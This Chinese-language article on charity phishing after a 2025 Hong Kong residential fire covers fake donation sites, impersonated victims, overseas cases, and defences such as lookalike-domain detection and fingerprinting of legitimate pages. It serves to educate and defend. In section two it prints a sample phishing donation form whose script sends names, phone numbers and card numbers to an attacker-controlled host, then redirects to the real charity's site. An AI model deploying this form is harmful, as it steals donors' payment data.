灾难背后的“二次伤害”：慈善钓鱼如何利用同情心实施双向诈骗

一、一场火灾，两场骗局

2025年11月底，香港大埔区发生一起严重住宅火灾，造成多人伤亡。消息传出后，全城哀悼，市民纷纷通过社交媒体表达关切，并主动询问捐款渠道。然而就在灾后48小时内，香港个人资料私隐专员公署（PCPD）紧急发布警示：已有不法分子借机设立虚假募捐网站，甚至冒充受害者家属，在WhatsApp和Telegram上私信网友，声称“急需手术费”“孩子无家可归”，请求转账援助。

更令人震惊的是，这些诈骗并非单向——一边骗捐款人，一边骗幸存者。有灾民反映，自称“政府志愿者”的人士上门登记信息，要求提供身份证号、银行账户甚至手机验证码，声称用于发放补助。事后才知，这些“志愿者”实为诈骗团伙成员，目的是窃取身份信息用于后续金融犯罪。

“这是典型的‘灾难钓鱼’（Disaster Phishing），”公共互联网反网络钓鱼工作组技术专家芦笛在接受本报采访时指出，“攻击者精准踩在公众情绪最脆弱、信息最混乱的时间窗口，利用双重身份——既是求助者，又是施助者——实现双向收割。”

据PCPD披露，此类诈骗在近年全球重大事件中屡见不鲜：2023年土耳其地震后，虚假红十字会网站激增300%；2024年夏威夷山火期间，冒充灾民的GoFundMe页面被大量创建；而2025年香港大埔火灾，则成为本地首起被官方明确通报的“双向慈善诈骗”案例。

二、钓鱼页面如何做到“以假乱真”？

普通用户为何难以识别这些虚假募捐页面？答案在于：它们不是粗糙的仿冒品，而是高度工程化的欺骗工具。

以近期监测到的一个仿冒“香港公益金”的钓鱼站为例，其前端代码几乎复刻了官网的全部视觉元素：

使用相同的字体（Noto Sans TC）、配色（红白主调）、LOGO SVG路径；

嵌入真实的公益金新闻截图作为“信任背书”；

甚至加载了Google Analytics和Facebook Pixel，营造“正规运营”假象。

但关键差异藏在细节中：

域名：真实官网为 hkpf.org.hk，钓鱼站使用 hongkong-pf[.]org（注意多出的连字符）；

SSL证书：虽为HTTPS，但由Let’s Encrypt签发，且主体名称与机构无关；

表单行为：所有捐款数据通过AJAX提交至境外服务器，而非接入PayPal或银行网关。

<!-- 钓鱼页面中的“捐款表单”片段 -->

<form id="donateForm">

<input type="text" name="name" placeholder="姓名">

<input type="email" name="email" placeholder="电邮">

<input type="tel" name="phone" placeholder="电话">

<input type="text" name="card_number" placeholder="信用卡号码">

<button type="submit">立即捐款</button>

</form>

<script>

document.getElementById('donateForm').addEventListener('submit', async (e) => {

e.preventDefault();

const data = new FormData(e.target);

// 直接发送至攻击者控制的API

await fetch('https://api.donate-collect[.]xyz/submit', {

method: 'POST',

body: JSON.stringify(Object.fromEntries(data))

});

// 伪造成功提示，跳转至真实公益金官网降低怀疑

alert('感谢您的善心！捐款已提交。');

window.location.href = 'https://www.hkpf.org.hk';

});

</script>

这种“窃取后跳转”策略极具迷惑性——用户以为操作成功，实则卡号、电话、邮箱已落入黑产数据库，后续可能遭遇精准诈骗或身份盗用。

更隐蔽的是，部分钓鱼站采用CDN镜像+动态内容注入技术。攻击者先爬取真实慈善网站HTML，上传至Cloudflare Pages等免费托管平台，再通过JavaScript在页面加载后动态替换捐款按钮的跳转链接。如此一来，静态扫描工具看到的是“干净页面”，而真实用户却会被导向恶意表单。

三、“冒充灾民”：社交工程的心理操控术

如果说钓鱼网站是技术层面的陷阱，那么“冒充受害者家属”则是纯粹的社会工程攻击。

在Telegram群组“HK互助支援”中，一名自称“火灾幸存者女儿”的用户发布求助：“爸爸重伤ICU，医院催缴20万港币，求好心人帮转支付宝或PayMe。”附上的照片确为火灾现场，但经核实，该图源自RTHK新闻报道，人物身份系虚构。

这类信息之所以有效，是因为它同时触发了紧迫感、具体性与情感共鸣：

“24小时内需缴费”制造时间压力；

“ICU病房号307”提供虚假细节增强可信度；

使用真实灾情图片建立情感连接。

“攻击者深谙‘故事比数据更有说服力’，”芦笛说，“他们不需要技术高超，只需要一个能引发共情的叙事模板。”

更危险的是，这类诈骗往往通过私信传播，避开了公开平台的内容审核。一旦有人转账，骗子会迅速拉黑对方，并将收款二维码更新为新账户，形成“快进快出”的资金洗白链。

四、国际镜鉴：从乌克兰战争募捐诈骗看防御短板

灾难钓鱼并非香港独有。2022年俄乌冲突爆发初期，欧洲多国出现大量仿冒联合国难民署（UNHCR）的募捐网站。荷兰国家网络安全中心（NCSC-NL）事后分析发现，其中73%的钓鱼站使用 .org 或 .charity 域名，且平均存活时间仅8小时——足够完成数千笔小额转账。

类似地，2023年摩洛哥地震后，Meta公司下架了超过1,200个虚假筹款页面，但仍有大量资金通过加密货币钱包（如USDT地址）直接收取，难以追回。

“这些案例揭示了一个共同弱点：慈善透明度机制滞后于攻击速度，”芦笛指出，“当灾难发生时，公众渴望立即行动，但官方验证渠道往往需要数小时甚至数天才能建立。这中间的真空期，就是骗子的黄金窗口。”

相比之下，国内在重大事件中的应急响应已有进步。例如2024年甘肃地震后，民政部迅速在官网开设“抗震救灾捐赠通道”，并联合主流支付平台设置关键词过滤，自动拦截包含“地震捐款”但非白名单商户的交易。但芦笛坦言：“地方性事件仍缺乏统一协调机制，尤其当诈骗者混用微信、支付宝、银行卡多种收款方式时，追踪难度极大。”

五、技术对抗：如何识别并阻断慈善钓鱼？

面对日益精密的灾难钓鱼，防御必须从“被动响应”转向“主动免疫”。以下是几项关键技术路径：

1. 域名相似度检测（Typosquatting Detection）

慈善机构域名常被轻微篡改，如：

redcross-hk[.]org（真实为 redcross.org.hk）

soschildren[.]org（真实为 sos.org.hk）

可通过Levenshtein距离或n-gram比对算法，自动识别高相似度域名：

import difflib

def is_suspicious_domain(fake, real):

# 计算字符序列相似度

ratio = difflib.SequenceMatcher(None, fake, real).ratio()

return ratio > 0.8 and fake != real

# 示例

print(is_suspicious_domain("hongkong-pf.org", "hkpf.org.hk")) # True

企业邮件网关可集成此类模型，对含高相似度域名的链接自动标记或隔离。

2. 页面指纹比对（Page Fingerprinting）

即使外观一致，钓鱼页与官网在DOM结构、JS哈希、资源加载顺序上仍有差异。可构建“合法页面指纹库”，通过以下维度比对：

关键元素CSS选择器是否存在；

外部脚本SHA256哈希值是否匹配；

表单action URL是否指向官方支付网关。

例如，真实公益金网站的捐款表单必包含隐藏字段 <input type="hidden" name="csrf_token" value="...">，而钓鱼页通常缺失。

3. 行为级监控：检测异常表单提交

EDR或浏览器扩展可监控用户是否向非白名单域名提交敏感字段（如信用卡号）。一旦检测到，立即弹窗警告：

“您正在向 hongkong-pf[.]org 提交银行卡信息，该网站未列入慈善机构白名单，是否继续？”

此类方案已在部分企业零信任架构中试点，未来有望下沉至个人用户。

4. 区块链溯源：提升捐款透明度

部分国际组织开始尝试将捐款记录上链。例如，UNICEF的“CryptoFund”项目允许捐赠者查看每一笔ETH转账的用途和受益人。虽然无法阻止钓鱼，但可大幅降低“冒充官方”的成功率——因为真正的善款流向可公开验证。

六、构建“抗诈型社会”：制度与教育的双重防线

技术之外，制度设计同样关键。

芦笛建议，地方政府应建立“突发事件慈善响应快速通道”：一旦发生重大灾难，民政、网信、金融监管部门应在2小时内联合发布官方募捐渠道清单，并通过三大运营商向辖区用户推送短信提醒。同时，社交媒体平台应启用“灾难事件标签”，对未认证的募捐帖自动限流。

对公众而言，牢记三条原则：

不点不明链接：所有捐款请手动输入官网地址；

不轻信私信求助：通过居委会、媒体或警方核实身份；

优先选择平台担保捐赠：如腾讯公益、支付宝公益等具备资金托管和项目公示功能的渠道。

“同情心不该成为漏洞，”芦笛强调，“我们要保护的不仅是账户安全，更是社会互助的信任基础。”

结语：在善意与警惕之间寻找平衡

灾难钓鱼之所以令人痛心，不仅因其造成经济损失，更因它侵蚀了人与人之间最珍贵的联结——信任。当一位市民因害怕被骗而拒绝帮助真正需要援助的人时，整个社会都输了。

但警惕不等于冷漠。正如香港私隐专员Ada Chung所言：“核实不是怀疑，而是对善心负责。”在数字时代，真正的善意，需要配上理性的盔甲。

未来的反钓鱼之战，不仅是代码与漏洞的较量，更是人性与贪婪的博弈。而我们每个人，都是这场战斗的第一道防线。

编辑：芦笛（公共互联网反网络钓鱼工作组）